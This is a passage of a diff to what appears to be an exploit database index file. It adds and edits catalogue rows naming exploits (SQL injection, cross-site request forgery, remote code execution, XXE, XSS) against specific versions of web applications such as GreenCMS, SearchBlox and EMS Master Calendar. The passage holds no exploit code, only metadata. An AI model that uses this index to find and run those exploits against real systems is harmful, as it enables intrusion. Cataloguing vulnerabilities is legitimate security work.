Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39489,5 +39492,7 @@ id,file,description,date,author,type,platform,port 44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php, 44823,exploits/php/webapps/44823.txt,"Smartshop 1 - 'id' SQL Injection",2018-06-03,L0RD,webapps,php, 44824,exploits/php/webapps/44824.html,"Smartshop 1 - Cross-Site Request Forgery",2018-06-03,L0RD,webapps,php, -44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,longer,webapps,php, -44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,longer,webapps,php, +44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,xichao,webapps,php, +44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,xichao,webapps,php, +44827,exploits/java/webapps/44827.txt,"SearchBlox 8.6.7 - XML External Entity Injection",2018-06-04,"Ahmet Gurel",webapps,java, +44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,